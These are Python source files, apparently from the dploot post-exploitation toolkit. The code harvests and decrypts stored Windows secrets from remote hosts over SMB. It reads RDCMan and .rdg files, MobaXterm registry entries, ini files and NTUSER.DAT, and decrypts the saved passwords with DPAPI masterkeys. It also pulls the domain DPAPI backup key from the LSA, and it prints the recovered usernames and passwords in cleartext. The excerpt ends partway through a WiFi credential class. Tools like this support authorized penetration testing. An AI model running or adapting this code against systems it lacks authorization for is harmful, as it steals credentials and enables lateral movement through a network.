        print("\tUsername:\t%s" % self.username)
        print("\tPassword:\t%s" % self.password.decode("latin-1"))
        print()

    def dump_quiet(self) -> None:
        print(
            "[RDG] {} - {}:{}".format(self.profile_name, self.username, self.password.decode("latin-1"))
        )


@dataclass
class RDGServerProfile(RDGProfile):
    server_name: str = None

    def dump(self) -> None:
        print("[SERVER PROFILES]")
        print("\tName:\t\t%s" % self.server_name)
        print("\tProfile Name:\t%s" % self.profile_name)
        print("\tUsername:\t%s" % self.username)
        print("\tPassword:\t%s" % self.password.decode("latin-1"))
        print()

    def dump_quiet(self) -> None:
        print(
            "[RDG] {} - {} - {}:{}".format(
                self.profile_name,
                self.server_name,
                self.username,
                self.password.decode("latin-1"),
            )
        )


@dataclass
class RDCMANFile:
    winuser: str
    filepath: str
    rdg_creds: List[RDGProfile]


@dataclass
class RDGFile:
    winuser: str
    filepath: str
    rdg_creds: List[RDGProfile]


class RDGTriage(Triage):
    user_rdcman_settings_generic_filepath = "Users\\%s\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings"
    user_rdg_generic_filepath = ["Users\\%s\\Documents", "Users\\%s\\Desktop"]
    share = "C$"

    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey],
        per_credential_callback: Any = None,
        false_positive: List[str] | None = None,
    ) -> None:
        super().__init__(
            target, 
            conn, 
            masterkeys=masterkeys, 
            per_loot_callback=per_credential_callback, 
            false_positive=false_positive
        )
        self._users = None
        
    def triage_rdcman(self) -> Tuple[List[RDCMANFile], List[RDGFile]]:
        rdcman_files = []
        rdgfiles = []
        for user in self.users:
            try:
                rdcman_user_file, rdg_user_files = self.triage_rdcman_for_user(user)
                rdcman_files.append(rdcman_user_file)
                rdgfiles += rdg_user_files
            except Exception as e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback

                    traceback.print_exc()
                    logging.debug(str(e))
        return rdcman_files, rdgfiles

    def triage_rdcman_for_user(self, user: str) -> Tuple[RDCMANFile, List[RDGFile]]:
        rdcman_file = None
        rdgfiles = []
        try:
            user_rcdman_settings_filepath = (
                self.user_rdcman_settings_generic_filepath % user
            )
            rdcmanblob_bytes = self.conn.readFile(
                self.share, user_rcdman_settings_filepath, looted_files=self.looted_files
            )
            if rdcmanblob_bytes:
                logging.debug("Found RDCMan Settings for %s user" % (user))
                if rdcmanblob_bytes is not None and self.masterkeys is not None:
                    xml_data = rdcmanblob_bytes
                    root = ET.fromstring(xml_data)
                    rdcman_file = RDCMANFile(
                        winuser=user,
                        filepath=f"\\\\{self.target.address}\\{self.share}\\{user_rcdman_settings_filepath}",
                        rdg_creds=self.triage_rdcman_settings(root),
                    )
                    rdgfiles_elements = root.find(".//FilesToOpen")
                    for item in rdgfiles_elements.findall(".//item"):
                        filename = item.text
                        if "\\\\" not in filename and "C:\\" in filename:
                            filepath = filename.replace("C:\\", "")
                            rdg_bytes = self.conn.readFile(self.share, filepath, looted_files=self.looted_files)
                            rdg_xml = ET.fromstring(rdg_bytes)
                            rdgfiles.append(
                                RDCMANFile(
                                    winuser=user,
                                    filepath=filename,
                                    rdg_creds=self.triage_rdgprofile(rdg_xml),
                                )
                            )
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))
        return rdcman_file, rdgfiles

    def triage_rdgprofile(self, rdgxml: ET.Element) -> List[RDGProfile]:
        rdg_creds = []
        for cred_profile in rdgxml.findall(".//credentialsProfile"):
            if cred_profile is not None:
                profile_name, username, password = self.triage_credprofile(cred_profile)
                rdg_cred = RDGCredProfile(
                    profile_name=profile_name,
                    username=username,
                    password=password,
                )
                rdg_creds.append(rdg_cred)
                if self.per_loot_callback is not None:
                    self.per_loot_callback(rdg_cred)

        for server_profile in rdgxml.findall(".//server"):
            server_name = server_profile.find(".//properties//name").text
            for item in server_profile.findall(".//logonCredentials"):
                profile_name, username, password = self.triage_credprofile(item)
                rdg_cred = RDGServerProfile(
                    profile_name=profile_name,
                    server_name=server_name,
                    username=username,
                    password=password,
                )
                rdg_creds.append(rdg_cred)
                if self.per_loot_callback is not None:
                    self.per_loot_callback(rdg_cred)
        return rdg_creds

    def triage_rdcman_settings(self, rdcman_settings: ET.Element) -> List[RDGProfile]:
        rdcman_creds = []
        for cred_profile in rdcman_settings.findall(".//credentialsProfile"):
            if cred_profile is not None:
                profile_name, username, password = self.triage_credprofile(cred_profile)
                rdcman_cred = RDGCredProfile(
                    profile_name=profile_name,
                    username=username,
                    password=password,
                )
                rdcman_creds.append(rdcman_cred)
                if self.per_loot_callback is not None:
                    self.per_loot_callback(rdcman_cred)

        for cred_profile in rdcman_settings.findall(".//logonCredentials"):
            if cred_profile is not None:
                profile_name, username, password = self.triage_credprofile(cred_profile)
                rdcman_cred = RGDLogonProfile(
                    profile_name=profile_name,
                    username=username,
                    password=password,
                )
                rdcman_creds.append(rdcman_cred)
                if self.per_loot_callback is not None:
                    self.per_loot_callback(rdcman_cred)
        return rdcman_creds

    def triage_credprofile(self, cred_node: ET.Element) -> Tuple[str, str, Any]:
        profile_name = cred_node.find(".//profileName").text
        full_username = ""
        password = b""
        if cred_node.find(".//userName") is not None:
            username = cred_node.find(".//userName").text
            domain = cred_node.find(".//domain").text
            b64password = cred_node.find(".//password").text

            full_username = username if domain == "" else f"{domain}\\{username}"
            if b64password is not None:
                pass_dpapi_blob = base64.b64decode(b64password)
                masterkey = find_masterkey_for_blob(pass_dpapi_blob, self.masterkeys)
                if masterkey is not None:
                    password = decrypt_blob(pass_dpapi_blob, masterkey)

        return profile_name, full_username, password

    @property
    def users(self) -> List[str]:
        if self._users is not None:
            return self._users

        self._users = self.conn.list_users(self.share)

        return self._users



# Define some dploot consts.

FALSE_POSITIVES = [
    ".",
    "..",
    "desktop.ini",
    "Public",
    "Default",
    "Default User",
    "All Users",
]

# simple class to check for false positives, case insensitive
class FalsePositives(list):
    def __init__(self,
                 false_positives: list[str] = None
    ) -> None:
        if false_positives is None:
            false_positives = FALSE_POSITIVES

        super().__init__(map (lambda x: x.lower(), false_positives))

    def __contains__(self, name):
        return super().__contains__(str(name).lower())

    def __setitem__(self, key, value):
        return super().__setitem__(key,str(value).lower())

    def append(self, element):
        return super().append(str(element).lower())


from abc import ABC, abstractmethod
from typing import List, Dict, Callable, Any

from dploot.lib.target import Target
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.masterkey import Masterkey
from dploot.lib.consts import FalsePositives

# Define base triage class.

class Triage:
    """
    Class Definition for the DPLoot Triage Class.
    """
    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey] = None,
        per_loot_callback: Callable = None,
        false_positive: List[str] | None = None,
    ) -> None:
        
        self.target = target
        self.conn = conn
        self.masterkeys = masterkeys
        self.per_loot_callback = per_loot_callback
        self.false_positive = FalsePositives(false_positive)

        self.looted_files = {}



import struct

from impacket.dcerpc.v5 import transport
from impacket import crypto
from impacket.uuid import bin_to_string
from impacket.dcerpc.v5 import lsad
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
from impacket.dpapi import P_BACKUP_KEY, PREFERRED_BACKUP_KEY, PVK_FILE_HDR

from dploot.triage import Triage
from dploot.lib.target import Target
from dploot.lib.smb import DPLootSMBConnection


class Backupkey:
    def __init__(self, backupkey_v1, pvk_header, pvk_data):
        self.backupkey_v1 = backupkey_v1
        self.pvk_header = pvk_header
        self.pvk_data = pvk_data
        self.backupkey_v2 = self.pvk_header.getData() + self.pvk_data


class BackupkeyTriage(Triage):
    def __init__(self, target: Target, conn: DPLootSMBConnection) -> None:
        super().__init__(target=target, conn=conn)
        
        self.dce = None
        self._users = None

    def connect(self) -> None:
        rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:445[\pipe\lsarpc]")
        rpctransport.set_smb_connection(self.conn.smb_session)
        self.dce = rpctransport.get_dce_rpc()
        if self.target.do_kerberos:
            self.dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
        try:
            self.dce.connect()
            self.dce.bind(lsad.MSRPC_UUID_LSAD)
        except transport.DCERPCException as e:
            raise e
    
    def triage_backupkey(self) -> Backupkey:
        if self.dce is None:
            self.connect()

        resp = lsad.hLsarOpenPolicy2(self.dce, lsad.POLICY_GET_PRIVATE_INFORMATION)
        backupkey_v1 = None
        pvk_header = None
        pvk_data = None
        for keyname in ("G$BCKUPKEY_PREFERRED", "G$BCKUPKEY_P"):
            buffer = crypto.decryptSecret(
                self.conn.smb_session.getSessionKey(),
                lsad.hLsarRetrievePrivateData(self.dce, resp["PolicyHandle"], keyname),
            )
            guid = bin_to_string(buffer)
            name = f"G$BCKUPKEY_{guid}"
            secret = crypto.decryptSecret(
                self.conn.smb_session.getSessionKey(),
                lsad.hLsarRetrievePrivateData(self.dce, resp["PolicyHandle"], name),
            )
            keyVersion = struct.unpack("<L", secret[:4])[0]
            if keyVersion == 1:  # legacy key
                backup_key = P_BACKUP_KEY(secret)
                backupkey_v1 = backup_key["Data"]

            elif keyVersion == 2:  # preferred key
                backup_key = PREFERRED_BACKUP_KEY(secret)
                pvk = backup_key["Data"][: backup_key["KeyLength"]]
                pvk_data = pvk
                header = PVK_FILE_HDR()
                header["dwMagic"] = 0xB0B5F11E
                header["dwVersion"] = 0
                header["dwKeySpec"] = 1
                header["dwEncryptType"] = 0
                header["cbEncryptData"] = 0
                header["cbPvk"] = backup_key["KeyLength"]
                pvk_header = header

        return Backupkey(
            backupkey_v1=backupkey_v1, pvk_header=pvk_header, pvk_data=pvk_data
        )



from base64 import b64decode
import logging
import ntpath
import os
import tempfile
from typing import Dict, List, Tuple, Optional, Callable
from Cryptodome.Cipher import AES

from impacket import winregistry
from impacket.dcerpc.v5 import rrp
from impacket.system_errors import ERROR_NO_MORE_ITEMS, ERROR_FILE_NOT_FOUND


from dploot.triage import Triage
from dploot.lib.dpapi import decrypt_blob, find_masterkey_for_blob
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target
from dploot.triage.masterkeys import Masterkey
from dataclasses import dataclass


@dataclass
class MobaXtermPassword:
    winuser: str
    username: str
    password_encrypted: bytes
    password: bytes = None

    def decrypt(self, masterpassword_key):
        iv = AES.new(key=masterpassword_key, mode=AES.MODE_ECB).encrypt(
            b"\x00" * AES.block_size
        )
        cipher = AES.new(
            key=masterpassword_key, iv=iv, mode=AES.MODE_CFB, segment_size=8
        )
        self.password = cipher.decrypt(b64decode(self.password_encrypted))

    def dump(self) -> None:
        print("[MOBAXTERM PASSWORD]")
        print("Username:\t%s" % self.username)
        if self.password is not None:
            print("Password:\t%s" % self.password.decode("latin-1"))
        print()

    def dump_quiet(self) -> None:
        print(f"[MOBAXTERM PASSWORD] {self.username}:{self.password}")


@dataclass
class MobaXtermCredential:
    winuser: str
    name: str
    username: str
    password_encrypted: bytes
    password: bytes = None

    def decrypt(self, masterpassword_key):
        iv = AES.new(key=masterpassword_key, mode=AES.MODE_ECB).encrypt(
            b"\x00" * AES.block_size
        )
        cipher = AES.new(
            key=masterpassword_key, iv=iv, mode=AES.MODE_CFB, segment_size=8
        )
        self.password = cipher.decrypt(b64decode(self.password_encrypted))

    def dump(self) -> None:
        print("[MOBAXTERM CREDENTIAL]")
        print("Name:\t\t%s" % self.name)
        print("Username:\t%s" % self.username)
        if self.password is not None:
            print("Password:\t%s" % self.password.decode("latin-1"))
        print()

    def dump_quiet(self) -> None:
        print(
            f"[MOBAXTERM CREDENTIAL] {self.name} - {self.username}:{self.password}"
        )


@dataclass
class MobaXtermMasterPassword:
    winuser: str
    username: str
    host: str
    entropy: bytes
    masterpassword_raw_value: bytes
    masterpassword_decrypted: bytes = None
    _key: bytes = None

    def decrypt_masterpassword_raw_value(self, masterkeys):
        dpapi_blob = bytes.fromhex(
            "01000000d08c9ddf0115d1118c7a00c04fc297eb"
        ) + b64decode(self.masterpassword_raw_value)
        masterkey = find_masterkey_for_blob(dpapi_blob, masterkeys)
        if masterkey is not None:
            self.masterpassword_decrypted = decrypt_blob(
                blob_bytes=dpapi_blob, masterkey=masterkey, entropy=self.entropy
            )

    @property
    def key(self):
        if self._key is not None:
            return self._key
        if self.masterpassword_decrypted is None:
            return self.masterpassword_decrypted

        self._key = b64decode(self.masterpassword_decrypted)[0:32]
        return self._key

    def dump(self) -> None:
        print("[MOBAXTERM MASTERPASSWORD KEY]")
        print("Host:\t\t\t%s" % self.host)
        print("Username:\t\t%s" % self.username)
        if self.masterpassword_decrypted is not None:
            print(
                "MasterPassword Key:\t%s"
                % b64decode(self.masterpassword_decrypted).hex()
            )
        print()

    def dump_quiet(self) -> None:
        print(
            f"[MOBAXTERM MASTERPASSWORD KEY] {self.host} - {self.username} - {b64decode(self.masterpassword_decrypted).hex()}"
        )


class MobaXtermTriage(Triage):    
    mobaxterm_conf_file_path = "Users\\{username}\\AppData\\Roaming\\MobaXterm\\MobaXterm.ini"
    mobaxterm_registry_key_path = "SOFTWARE\\Mobatek\\MobaXterm"
    mobaxterm_sessionp_key_path = ntpath.join(mobaxterm_registry_key_path, "SessionP")
    mobaxterm_masterpassword_registry_key = "M"
    mobaxterm_passwords_registry_key = "P"
    mobaxterm_credentials_registry_key = "C"

    ntuser_dat_path = "Users\\{username}\\NTUSER.DAT"
    share = "C$"

    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey],
        per_secret_callback: Callable = None,
        false_positive: List[str] | None = None,
    ) -> None:
        super().__init__(
            target, 
            conn, 
            masterkeys=masterkeys, 
            per_loot_callback=per_secret_callback, 
            false_positive=false_positive
        )
        self._users = None

    def triage_mobaxterm(
        self, offline_users: bool = False
    ) -> Tuple[
        List[MobaXtermMasterPassword], List["MobaXtermCredential | MobaXtermPassword"]
    ]:
        logging.getLogger("impacket").disabled = True
        mobaxterm_credentials = []
        mobaxterm_masterpassword_key = []
        for user, sid in self.users.items():
            try:
                masterpassword_key, credentials = self.triage_mobaxterm_for_user(
                    user, sid, offline_users
                )
                if masterpassword_key is not None:
                    mobaxterm_credentials += credentials
                    mobaxterm_masterpassword_key.append(masterpassword_key)
            except Exception as e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback

                    traceback.print_exc()
                    logging.debug(str(e))
        return mobaxterm_masterpassword_key, mobaxterm_credentials

    def triage_mobaxterm_for_user(
        self, user: str, sid: Optional[str] = None, offline_users: bool = False
    ) -> Tuple[
        MobaXtermMasterPassword, List["MobaXtermCredential | MobaXtermPassword"]
    ]:
        mobaxterm_masterpassword = None
        mobaxterm_credentials = []

        mobaxterm_masterpassword, mobaxterm_credentials = self.extract_mobaxtermkeys_for_user_from_files(user, sid)
        if not self.conn.local_session and (mobaxterm_masterpassword is None or len(mobaxterm_credentials) == 0):

            logging.debug(f"Triaging MobaXterm for user {user}")
            mobaxterm_masterpassword, mobaxterm_credentials = (
                self.extract_mobaxtermkeys_for_user_from_remote_registry(user, sid)
            )

        if mobaxterm_masterpassword is None and offline_users:
            try:
                ntuser_dat_bytes = (
                    self.conn.readFile(
                        self.share, self.ntuser_dat_path.format(username=user), looted_files=self.looted_files
                    )
                    if offline_users
                    else None
                )
            except Exception as e:
                import traceback

                traceback.print_exc()
                logging.error(e)

            # Preparing NTUSER.DAT file
            fh = tempfile.NamedTemporaryFile()
            fh.write(ntuser_dat_bytes)
            fh.seek(0)
            # Extracting everything

            mobaxterm_masterpassword, mobaxterm_credentials = (
                self.extract_mobaxtermkeys_for_user_from_ntuser_dat(fh.name, user)
            )

        return mobaxterm_masterpassword, mobaxterm_credentials

    def extract_mobaxtermkeys_for_user_from_ntuser_dat(
        self, ntuser_dat_filename: str, user: str
    ) -> Tuple[
        MobaXtermMasterPassword, List["MobaXtermCredential | MobaXtermPassword"]
    ]:
        reg = winregistry.Registry(ntuser_dat_filename, isRemote=False)
        parent_key = reg.findKey(self.mobaxterm_registry_key_path)
        if parent_key is None:
            # MobaXterm is not installed for this user
            return None, []
        logging.debug(f"Found MobaXterm registry keys for user {user}")

        mobaxterm_masterpassword_key = None
        mobaxterm_credentials = []

        try:
            entropy = reg.getValue(self.mobaxterm_sessionp_key_path)[1]
            entropy = entropy.decode("utf-16le").rstrip("\0").encode()
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))

        try:
            key_path = ntpath.join(
                self.mobaxterm_registry_key_path,
                self.mobaxterm_masterpassword_registry_key,
            )
            new_key = reg.findKey(key_path)
            values = reg.enumValues(new_key)
            data = reg.getValue(ntpath.join(key_path, values[-1].decode("utf-8")))
            username, host = values[-1].decode("utf-8").split("@")
            mobaxterm_masterpassword_key = MobaXtermMasterPassword(
                winuser=user,
                username=username,
                host=host,
                entropy=entropy,
                masterpassword_raw_value=data[1],
            )
            mobaxterm_masterpassword_key.decrypt_masterpassword_raw_value(
                masterkeys=self.masterkeys
            )
            logging.debug(f"Found Mobaxterm MasterPassword for user {user}")
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))
        if mobaxterm_masterpassword_key.key is None:
            return mobaxterm_masterpassword_key, mobaxterm_credentials
        try:
            key_path = ntpath.join(
                self.mobaxterm_registry_key_path,
                self.mobaxterm_credentials_registry_key,
            )
            key = reg.findKey(key_path)
            values = reg.enumValues(key)
            logging.debug(f"Found {len(values)} Mobaxterm Credentials for user {user}")
            for value in values:
                _, data = reg.getValue(ntpath.join(key_path, value.decode("latin-1")))
                username, password_encrypted = data.split(b":")
                mobaxterm_credential = MobaXtermCredential(
                    winuser=user,
                    name=value.decode("latin-1"),
                    username=username.decode("utf-16le", errors="backslashreplace"),
                    password_encrypted=password_encrypted,
                )
                mobaxterm_credential.decrypt(mobaxterm_masterpassword_key.key)
                mobaxterm_credentials.append(mobaxterm_credential)
                if self.per_loot_callback is not None:
                    self.per_loot_callback(mobaxterm_credential)
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))

        try:
            key_path = ntpath.join(
                self.mobaxterm_registry_key_path, self.mobaxterm_passwords_registry_key
            )
            key = reg.findKey(key_path)
            values = reg.enumValues(key)
            logging.debug(f"Found {len(values)} Mobaxterm Passwords for user {user}")
            for value in values:
                data = reg.getValue(ntpath.join(key_path, value.decode("utf-8")))
                mobaxterm_credential = MobaXtermPassword(
                    winuser=user,
                    username=value.decode("latin-1"),
                    password_encrypted=data[-1].decode("latin-1"),
                )
                mobaxterm_credential.decrypt(mobaxterm_masterpassword_key.key)
                mobaxterm_credentials.append(mobaxterm_credential)
                if self.per_loot_callback is not None:
                    self.per_loot_callback(mobaxterm_credential)
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))
        return mobaxterm_masterpassword_key, mobaxterm_credentials

    def extract_entropy_for_user(self, user: str, sid: str):
        # Extract entropy
        entropy = None
        ans = rrp.hOpenUsers(self.conn.remote_ops._RemoteOperations__rrp)
        regHandle = ans["phKey"]
        regKey = ntpath.join(sid, self.mobaxterm_registry_key_path)
        keyHandle = None
        try:
            ans2 = rrp.hBaseRegOpenKey(
                self.conn.remote_ops._RemoteOperations__rrp,
                regHandle,
                regKey,
                samDesired=rrp.MAXIMUM_ALLOWED
                | rrp.KEY_ENUMERATE_SUB_KEYS
                | rrp.KEY_QUERY_VALUE,
            )
            keyHandle = ans2["phkResult"]
            _, entropy = rrp.hBaseRegQueryValue(
                self.conn.remote_ops._RemoteOperations__rrp, keyHandle, "SessionP"
            )
            entropy = entropy.rstrip("\00").encode("utf-8")
            rrp.hBaseRegCloseKey(self.conn.remote_ops._RemoteOperations__rrp, keyHandle)
        except rrp.DCERPCSessionError as e:
            if e.get_error_code() == ERROR_FILE_NOT_FOUND:
                logging.debug(
                    f"ERROR_FILE_NOT_FOUND while querying for user {user} on HKU: must be offline"
                )
            else:
                import traceback

                traceback.print_exc()
                logging.error(f"Error while hBaseRegOpenKey HKU\\{regKey}: {e}")
        return entropy

    def extract_mobaxtermkeys_for_user_from_files(self, user: str, sid: str) -> Tuple[
        MobaXtermMasterPassword, List["MobaXtermCredential | MobaXtermPassword"]
    ]:
        self.conn.enable_remoteops()

        mobaxterm_masterpassword_key = None
        mobaxterm_credentials = []

        # Extract entropy
        entropy = self.extract_entropy_for_user(user, sid)
        if entropy is None:
            return None, []
        
        # Extract all
        try:
            conf_file = self.conn.readFile(
                self.share, self.mobaxterm_conf_file_path.format(username=user), looted_files=self.looted_files
            )
            dpapi_blob = conf_file.split(b"[Sesspass]\r\n")[1].split(b"\r\n")[0].split(b"=",1)[1]
            mobaxterm_masterpassword_key = MobaXtermMasterPassword(
                winuser=user,
                entropy=entropy,
                host="",
                username="",
                masterpassword_raw_value=dpapi_blob
            )
            
            mobaxterm_masterpassword_key.decrypt_masterpassword_raw_value(
                masterkeys=self.masterkeys
            )

            logging.debug(f"Found Mobaxterm MasterPassword for user {user}")

            credentials = conf_file.split(b"[Credentials]\r\n")[1].split(b"\r\n\r\n")[0]
            for credential in credentials.split(b"\r\n"):
                name, username = credential.decode().split("=",1)
                username, password_encrypted = username.split(":",1)
                mobaxterm_credential = MobaXtermCredential(
                    winuser=user,
                    name=name,
                    username=username,
                    password_encrypted=password_encrypted,
                )
                mobaxterm_credential.decrypt(mobaxterm_masterpassword_key.key)
                mobaxterm_credentials.append(mobaxterm_credential)
                if self.per_loot_callback is not None:
                    self.per_loot_callback(mobaxterm_credential)

            passwords = conf_file.split(b"[Passwords]\r\n")[1].split(b"\r\n\r\n")[0]
            for password in passwords.split(b"\r\n"):
                username, encrypted_pass = password.decode().split("=",1)
                mobaxterm_credential = MobaXtermPassword(
                    winuser=user, username=username, password_encrypted=encrypted_pass
                )
                mobaxterm_credential.decrypt(mobaxterm_masterpassword_key.key)
                mobaxterm_credentials.append(mobaxterm_credential)
                if self.per_loot_callback is not None:
                    self.per_loot_callback(mobaxterm_credential)
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
            logging.debug(str(e))
        return mobaxterm_masterpassword_key, mobaxterm_credentials

    def extract_mobaxtermkeys_for_user_from_remote_registry(
        self, user: str, sid: str
    ) -> Tuple[
        MobaXtermMasterPassword, List["MobaXtermCredential | MobaXtermPassword"]
    ]:
        self.conn.enable_remoteops()

        mobaxterm_masterpassword_key = None
        mobaxterm_credentials = []

        # Extract entropy
        entropy = self.extract_entropy_for_user(user, sid)
        if entropy is None:
            return None, []
        
        ans = rrp.hOpenUsers(self.conn.remote_ops._RemoteOperations__rrp)
        regHandle = ans["phKey"]
        regKey = ntpath.join(sid, self.mobaxterm_registry_key_path)

        # Extract M
        try:
            ans2 = rrp.hBaseRegOpenKey(
                self.conn.remote_ops._RemoteOperations__rrp,
                regHandle,
                ntpath.join(regKey, self.mobaxterm_masterpassword_registry_key),
                samDesired=rrp.MAXIMUM_ALLOWED
                | rrp.KEY_ENUMERATE_SUB_KEYS
                | rrp.KEY_QUERY_VALUE,
            )
            keyHandle = ans2["phkResult"]
            value = rrp.hBaseRegEnumValue(
                self.conn.remote_ops._RemoteOperations__rrp, keyHandle, 0
            )
            name, host = value["lpValueNameOut"].split("@")
            mobaxterm_masterpassword_key = MobaXtermMasterPassword(
                winuser=user,
                entropy=entropy,
                host=host,
                username=name,
                masterpassword_raw_value=b"".join(value["lpData"]),
            )
            mobaxterm_masterpassword_key.decrypt_masterpassword_raw_value(
                masterkeys=self.masterkeys
            )
            logging.debug(f"Found Mobaxterm MasterPassword for user {user}")
            rrp.hBaseRegCloseKey(self.conn.remote_ops._RemoteOperations__rrp, keyHandle)
        except rrp.DCERPCSessionError as e:
            # try extract with file
            if e.get_error_code() == ERROR_FILE_NOT_FOUND:
                try:
                    conf_file = self.conn.readFile(
                                self.share, self.mobaxterm_conf_file_path.format(username=user), looted_files=self.looted_files
                            )
                    dpapi_blob = conf_file.split(b"[Sesspass]\r\n")[1].split(b"\r\n")[0].split(b"=",1)[1]
                    mobaxterm_masterpassword_key = MobaXtermMasterPassword(
                        winuser=user,
                        entropy=entropy,
                        host="",
                        username="",
                        masterpassword_raw_value=dpapi_blob
                    )
                    
                    mobaxterm_masterpassword_key.decrypt_masterpassword_raw_value(
                        masterkeys=self.masterkeys
                    )

                    logging.debug(f"Found Mobaxterm MasterPassword for user {user}")
                except Exception as e:
                    if logging.getLogger().level == logging.DEBUG:
                        import traceback

                        traceback.print_exc()
                    logging.debug(str(e))
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))
        if mobaxterm_masterpassword_key is None:
            return None, []
        # Extract C and P
        for key in [
            self.mobaxterm_credentials_registry_key,
            self.mobaxterm_passwords_registry_key,
        ]:
            ans2 = rrp.hBaseRegOpenKey(
                self.conn.remote_ops._RemoteOperations__rrp,
                regHandle,
                ntpath.join(regKey, key),
                samDesired=rrp.MAXIMUM_ALLOWED
                | rrp.KEY_ENUMERATE_SUB_KEYS
                | rrp.KEY_QUERY_VALUE,
            )
            keyHandle = ans2["phkResult"]
            i = 0
            while True:
                try:
                    value = rrp.hBaseRegEnumValue(
                        self.conn.remote_ops._RemoteOperations__rrp, keyHandle, i
                    )
                    data = b"".join(value["lpData"])
                    name = value["lpValueNameOut"].rstrip("\00")
                    if b":" in data:
                        username, password_encrypted = data.split(b":")
                        mobaxterm_credential = MobaXtermCredential(
                            winuser=user,
                            name=name,
                            username=username.decode(
                                "utf-16le", errors="backslashreplace"
                            ),
                            password_encrypted=password_encrypted,
                        )
                    else:
                        mobaxterm_credential = MobaXtermPassword(
                            winuser=user, username=name, password_encrypted=data
                        )
                    mobaxterm_credential.decrypt(mobaxterm_masterpassword_key.key)
                    mobaxterm_credentials.append(mobaxterm_credential)
                    i += 1
                    if self.per_loot_callback is not None:
                        self.per_loot_callback(mobaxterm_credential)
                except rrp.DCERPCSessionError as e:
                    if e.get_error_code() == ERROR_NO_MORE_ITEMS:
                        break
        return mobaxterm_masterpassword_key, mobaxterm_credentials

    @property
    def users(self) -> Dict[str, str]:
        """Returns dict of username: sid"""
        if self._users is not None:
            return self._users

        users = {}
        sids = []
        userlist_key = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList"

        if self.conn.local_session:
            reg = winregistry.Registry(
                os.path.join(
                    self.conn.target.local_root, r"Windows/System32/config/SOFTWARE"
                ),
                isRemote=False,
            )
            parentKey = reg.findKey(userlist_key[8:])
            if parentKey is None:
                self._users = users
                reg.close()
                return self._users

            sids = list(reg.enumKey(parentKey))

            for sid in sids:
                (v_type, v_data) = reg.getValue(
                    ntpath.join(userlist_key[8:], sid, "ProfileImagePath")
                )
                profile_path = v_data.decode("utf-16le").rstrip("\0")
                if r"%systemroot%" in profile_path:
                    continue
                users[ntpath.basename(profile_path)] = sid

            reg.close()

        else:
            self.conn.enable_remoteops()
            ans = rrp.hOpenLocalMachine(self.conn.remote_ops._RemoteOperations__rrp)
            regHandle = ans["phKey"]

            ans = rrp.hBaseRegOpenKey(
                self.conn.remote_ops._RemoteOperations__rrp,
                regHandle,
                userlist_key,
                samDesired=rrp.MAXIMUM_ALLOWED
                | rrp.KEY_ENUMERATE_SUB_KEYS
                | rrp.KEY_QUERY_VALUE,
            )
            keyHandle = ans["phkResult"]

            i = 0
            while True:
                try:
                    ans2 = rrp.hBaseRegEnumKey(
                        self.conn.remote_ops._RemoteOperations__rrp, keyHandle, i
                    )
                    sids.append(ans2["lpNameOut"])
                except rrp.DCERPCSessionError as e:
                    if e.get_error_code() == ERROR_NO_MORE_ITEMS:
                        break
                except Exception as e:
                    if logging.getLogger().level == logging.DEBUG:
                        import traceback

                        traceback.print_exc()
                    logging.error(e)
                i += 1
            rrp.hBaseRegCloseKey(self.conn.remote_ops._RemoteOperations__rrp, keyHandle)
            for sid in sids:
                ans = rrp.hBaseRegOpenKey(
                    self.conn.remote_ops._RemoteOperations__rrp,
                    regHandle,
                    ntpath.join(userlist_key, sid),
                    samDesired=rrp.MAXIMUM_ALLOWED
                    | rrp.KEY_ENUMERATE_SUB_KEYS
                    | rrp.KEY_QUERY_VALUE,
                )
                keyHandle = ans["phkResult"]
                _, profile_path = rrp.hBaseRegQueryValue(
                    self.conn.remote_ops._RemoteOperations__rrp,
                    keyHandle,
                    "ProfileImagePath",
                )
                if r"%systemroot%" in profile_path:
                    continue
                users[ntpath.basename(profile_path.rstrip("\0"))] = sid.rstrip("\0")
                rrp.hBaseRegCloseKey(
                    self.conn.remote_ops._RemoteOperations__rrp, keyHandle
                )

        self._users = users
        return self._users



from binascii import unhexlify
import itertools
import logging
import ntpath
import os
from typing import Any, List, Optional, Callable
from lxml import objectify

from impacket.dcerpc.v5 import rrp
from impacket.winregistry import Registry
from impacket.system_errors import ERROR_NO_MORE_ITEMS, ERROR_FILE_NOT_FOUND


from dploot.triage import Triage
from dploot.lib.dpapi import decrypt_blob, find_masterkey_for_blob
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target
from dploot.triage.masterkeys import Masterkey

EAP_TYPES = {
    13: "EAP TLS",
    18: "EAP SIM",
    21: "EAP TTLS",
    23: "EAP AKA",
    25: "PEAP",
    50: "EAP AKA PRIME",
}


class WifiCred:
    def __init__(
        self,
        ssid: str,
        auth: str,
        encryption: str,
        password: Optional[str] = None,
        xml_data: Any = None,
        eap_username: Optional[str] = None,
        eap_domain: Optional[str] = None,
        eap_password: Optional[str] = None,
    ) -> None:
        self.ssid = ssid
        self.auth = auth
        self.encryption = encryption
        self.password = password
